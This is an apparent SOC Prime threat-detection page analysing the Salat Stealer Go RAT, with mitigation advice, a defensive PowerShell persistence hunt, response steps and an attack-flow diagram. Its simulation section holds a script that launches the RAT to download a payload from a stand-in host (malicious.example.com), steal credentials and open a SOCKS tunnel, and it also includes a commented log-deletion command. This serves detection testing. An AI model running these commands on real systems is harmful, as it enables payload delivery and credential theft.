07 May 2026 18:58

Salat Stealer Analysis Go Based RAT C2 Resilience and Info Stealing Capabilities

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Salat Stealer is a Go-based remote access trojan that functions as a full-featured post-exploitation framework. It supports multiple communication channels, including WebSocket, HTTP/2, HTTP/3, and QUIC, giving operators flexible and resilient command-and-control options. The malware also includes broad data theft capabilities, targeting browser data, cryptocurrency wallets, keystrokes, and screenshots, and it can pivot into the victim's network through a SOCKS5 proxy. To survive reboots, it uses hidden file copies, scheduled tasks, and a Run registry key. If its primary infrastructure is disrupted, the malware can retrieve updated command-and-control details through the TON blockchain.

Investigation

The analysis explains how the malware derives encryption keys from static strings combined with the victim’s hostname, then uses them to decrypt five embedded command-and-control URLs. Researchers also documented how Salat Stealer selects its transport protocol, processes operator commands, attempts privilege escalation, and deploys multiple persistence methods on the host. The report further outlines the range of stolen data and the broader remote access functions available to the attacker.

Mitigation

Defenders should monitor for connections to the identified command-and-control URLs, as well as unexpected QUIC and WebSocket traffic to unknown destinations. Security teams should also watch for hidden scheduled tasks and suspicious Run key entries that point to unfamiliar executables, particularly entries that borrow a Windows system binary name such as explorer.exe or svchost.exe but resolve to a path outside the Windows directory. Application allow-listing and strict execution controls can help prevent the Go-based payload from running. Network segmentation and TLS inspection can further improve visibility into suspicious outbound traffic. Note that QUIC runs over UDP (typically port 443) and is not seen by most TLS-inspecting proxies, so blocking outbound UDP/443 at the egress leaves only the malware's TCP-based options, WebSocket and HTTP/2, available, where inspection can apply.
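The following hunt script is an added example, not code from the SOC Prime report or from the malware analysis it summarizes. It checks the two host-side persistence locations the report names, scheduled tasks and the HKCU Run key, for the masquerading pattern the attack flow describes: a target executable named like a Windows system binary (explorer.exe, svchost.exe) that lives outside the Windows directory, a hidden task, or a target that does not carry a valid Authenticode signature. The list of masqueraded names and the signature check are assumptions chosen for this example; the report states the names but not the signing status of the payload.

```powershell
# Added example (not from the original report): hunt for hidden scheduled tasks
# and HKCU Run entries whose target executable looks masqueraded or is unsigned.
# Requires the ScheduledTasks module (Windows 8 / Server 2012 or later).

$systemNames = @('explorer.exe', 'svchost.exe')   # names the attack flow says are borrowed (assumption: extend as needed)
$windowsDir  = $env:SystemRoot

function Test-SuspiciousTarget {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    # Strip surrounding quotes and expand %VAR% references stored in the task or Run value.
    $clean = [Environment]::ExpandEnvironmentVariables($Path.Trim('"'))
    $name  = [IO.Path]::GetFileName($clean).ToLowerInvariant()
    $inWindows = $clean.StartsWith($windowsDir, [StringComparison]::OrdinalIgnoreCase)
    # A system binary name outside %SystemRoot% is the masquerade the report describes.
    if ($systemNames -contains $name -and -not $inWindows) { return $true }
    # Anything that exists on disk but is not validly signed is worth a look (assumption: the payload is unsigned).
    if (Test-Path -LiteralPath $clean -PathType Leaf) {
        $sig = Get-AuthenticodeSignature -FilePath $clean
        if ($sig.Status -ne 'Valid') { return $true }
    }
    return $false
}

$findings = @()

# 1. Scheduled tasks: flag hidden tasks and tasks whose action target looks masqueraded.
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }          # COM-handler actions have no Execute path
        $suspicious = Test-SuspiciousTarget $action.Execute
        if ($task.Settings.Hidden -or $suspicious) {
            $findings += [pscustomobject]@{
                Source = 'ScheduledTask'
                Name   = "$($task.TaskPath)$($task.TaskName)"
                Target = $action.Execute
                Hidden = [bool]$task.Settings.Hidden
            }
        }
    }
}

# 2. HKCU Run key: flag values whose executable looks masqueraded or is unsigned.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
if (Test-Path $runKey) {
    $props = Get-ItemProperty -Path $runKey
    foreach ($prop in $props.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }        # skip the provider's PSPath/PSDrive metadata
        $exe = ([string]$prop.Value -split '\s+(?=-|/)')[0]   # keep the executable, drop trailing -x or /x switches
        if (Test-SuspiciousTarget $exe) {
            $findings += [pscustomobject]@{
                Source = 'RunKey'
                Name   = $prop.Name
                Target = $prop.Value
                Hidden = $false
            }
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Host 'No hidden or masqueraded persistence entries found.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it in an elevated session so that tasks registered under other users and in protected task folders are enumerated. The unsigned-binary check will surface legitimate but unsigned software as well as the malware, so treat its output as a candidate list to triage, with the masqueraded-name hits reviewed first.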

Response

If Salat Stealer activity is detected, isolate the affected system immediately, capture memory and disk images, and only then terminate the malicious processes, so that volatile evidence such as the decrypted command-and-control URLs is preserved. Remove all persistence artifacts, including scheduled tasks, Run key entries, and hidden file copies used by the malware. The identified command-and-control domains should be blocked, along with any related TON blockchain lookups used for fallback infrastructure discovery. Exposed credentials and cryptocurrency wallets should also be rotated or secured without delay.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#ffcc99
        classDef malware fill:#ff9999
        classDef process fill:#ccffcc

        %% Malware definition
        malware_salatr["<b>Malware</b> – <b>Name</b>: Salat Stealer (Go RAT)<br/><b>Description</b>: Go-based remote access trojan used for theft, persistence and lateral movement."]
        class malware_salatr malware

        %% Initial execution process
        process_start["<b>Process</b> – <b>Name</b>: SalatStealer.exe<br/><b>Action</b>: Starts, retrieves own path, checks for existing instance, may bypass UAC.<br/><b>Technique</b>: T1548.002 Bypass User Account Control<br/><b>Technique</b>: T1027.008 Obfuscated/Stored Files"]
        class process_start process
        malware_salatr -->|executes| process_start

        %% Persistence mechanisms
        persistence_task["<b>Action</b> – <b>T1053.005 Scheduled Task</b>: Creates hidden scheduled task with masqueraded name (explorer.exe)."]
        class persistence_task action
        persistence_reg["<b>Action</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b>: HKCU\Run entry using disguised name (svchost.exe)."]
        class persistence_reg action
        process_start -->|creates| persistence_task
        process_start -->|creates| persistence_reg

        %% Defense evasion
        defense_evasion["<b>Action</b> – <b>T1027 Obfuscated Files</b>: Six-mode string obfuscation and per-machine key derivation."]
        class defense_evasion action
        process_start -->|applies| defense_evasion

        %% System discovery
        discovery["<b>Action</b> – <b>T1082 System Information Discovery</b>: Gathers OS, CPU, GPU, RAM, active window title, admin status and builds an agent identifier."]
        class discovery action
        process_start -->|performs| discovery

        %% Credential access
        credential_access["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b>: Dumps Chromium, Firefox, Discord, Steam browsers and DPAPI-encrypted passwords.<br/><b>Additional techniques</b>: T1056.001 Keylogging, T1115 Clipboard Data."]
        class credential_access action
        process_start -->|performs| credential_access

        %% Collection of data
        collection["<b>Action</b> – <b>T1113 Screenshot</b>, <b>T1125 Video Capture</b>, <b>T1560.001 Archive via Utility</b>: Captures screen, webcam video and archives data into ZIP files."]
        class collection action
        credential_access -->|collects| collection

        %% Command and control
        c2["<b>Action</b> – <b>T1071.005 WebSocket</b> and <b>T1071.001 Web Protocol</b>: Communicates over QUIC/WebSocket with encrypted URLs; falls back to alternate endpoints and TON blockchain.<br/><b>Technique</b>: T1008 Fallback Channels"]
        class c2 action
        collection -->|exfiltrates via| c2

        %% Exfiltration
        exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b>, <b>T1048 Exfiltration Over Alternative Protocol</b>, <b>T1020 Automated Exfiltration</b>: Sends archived data and stolen credentials."]
        class exfiltration action
        c2 -->|sends data| exfiltration

        %% Execution of remote commands
        command_exec["<b>Action</b> – <b>T1059.003 Windows Command Shell</b>: Receives and runs command-line instructions from the attacker.<br/><b>Technique</b>: T1090.001 SOCKS5 Proxy for tunneling."]
        class command_exec action
        exfiltration -->|receives commands| command_exec

        %% Lateral movement via proxy
        lateral["<b>Action</b> – <b>T1090.001 Proxy (SOCKS5)</b>: Establishes internal SOCKS5 tunnel for pivoting and lateral movement."]
        class lateral action
        command_exec -->|establishes| lateral

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has delivered the Salat RAT binary (salat.exe) to the victim host via a phishing attachment. After gaining a low‑privilege foothold, the attacker executes the binary with specific arguments to:

    1. Download a secondary payload: main.downloadFile https://malicious.example.com/payload.exe
    2. Steal stored credentials: main.Steal -module credentials
    3. Establish a peer‑to‑peer SOCKS tunnel for lateral movement: main.p2pSocks -listen 1080 -remote 10.0.0.5:4444

    The binary is launched from an elevated PowerShell session to satisfy the elevation requirement (T1548, Abuse Elevation Control Mechanism). Each invocation appears as a distinct Sysmon process creation event (Event ID 1) whose CommandLine field carries the corresponding arguments, satisfying the Sigma rule’s string match.

  • Regression Test Script:

    # -------------------------------------------------
    # Salat RAT simulation script – triggers detection
    # Run from an elevated PowerShell session (see narrative above)
    # -------------------------------------------------
    $binaryPath = "C:\Temp\salat.exe"
    
    # Ensure the binary exists (placeholder – in a real test the binary would be pre‑staged)
    if (-Not (Test-Path $binaryPath)) {
        Write-Error "Salat binary not found at $binaryPath"
        exit 1
    }
    
    # 1. Download secondary payload
    Start-Process -FilePath $binaryPath -ArgumentList "main.downloadFile https://malicious.example.com/payload.exe" -Wait
    
    # 2. Steal credentials
    Start-Process -FilePath $binaryPath -ArgumentList "main.Steal -module credentials" -Wait
    
    # 3. Open P2P SOCKS tunnel
    Start-Process -FilePath $binaryPath -ArgumentList "main.p2pSocks -listen 1080 -remote 10.0.0.5:4444" -Wait
    
    Write-Host "Simulation completed."
  • Cleanup Commands:

    # -------------------------------------------------
    # Cleanup for Salat RAT simulation
    # -------------------------------------------------
    # Terminate any lingering Salat processes
    Get-Process -Name "salat" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remove the binary (if allowed)
    $binaryPath = "C:\Temp\salat.exe"
    if (Test-Path $binaryPath) {
        Remove-Item $binaryPath -Force
        Write-Host "Removed $binaryPath"
    }
    
    # Optionally clear related Sysmon events from the test index (Splunk example)
    # splunk cmd search '| delete index=main host="test-host" sourcetype="Sysmon" earliest=-24h latest=now'
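After the simulation, a practitioner wants to confirm that the three invocations actually produced the telemetry the narrative promises before concluding that the detection rule fired or failed. The following script is an added example, not part of the original page, and assumes Sysmon is installed with its default ProcessCreate logging to the Microsoft-Windows-Sysmon/Operational channel. It reads Event ID 1 records from the last 30 minutes and checks that each of the three command-line markers from the simulation appears in at least one event's CommandLine field.

```powershell
# Added example (not from the original page): verify that the simulated Salat
# command lines produced Sysmon process-creation (Event ID 1) telemetry.
# Assumes Sysmon is installed and logging ProcessCreate to its default channel.

# Markers taken from the simulation narrative above.
$expected = @('main.downloadFile', 'main.Steal', 'main.p2pSocks')

$filter = @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = (Get-Date).AddMinutes(-30)   # assumption: the simulation ran within the last 30 minutes
}

# Get-WinEvent raises a non-terminating error when nothing matches; treat that as "no events".
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

function Get-SysmonField {
    param($Event, [string]$Name)
    # Sysmon stores each field as <Data Name="...">value</Data> in the event XML.
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$hits = foreach ($e in $events) {
    $cmd = Get-SysmonField -Event $e -Name 'CommandLine'
    $img = Get-SysmonField -Event $e -Name 'Image'
    foreach ($marker in $expected) {
        if ($cmd -and $cmd.Contains($marker)) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Marker      = $marker
                Image       = $img
                CommandLine = $cmd
            }
        }
    }
}

$hits | Format-Table -AutoSize

# Report any marker that produced no event at all.
$missing = $expected | Where-Object { $m = $_; -not ($hits | Where-Object Marker -eq $m) }
if ($missing) {
    Write-Warning "No Sysmon Event ID 1 seen for: $($missing -join ', '). Check that the Sysmon configuration does not exclude the test binary and that the simulation ran in this time window."
    exit 1
}
Write-Host 'All three simulated command lines produced Sysmon process-creation telemetry.'
```

A missing marker here points at a telemetry gap (Sysmon exclusion rules, the wrong log channel, or the binary never executing) rather than at the Sigma rule, which is the distinction the Telemetry & Baseline Pre‑flight Check is meant to enforce.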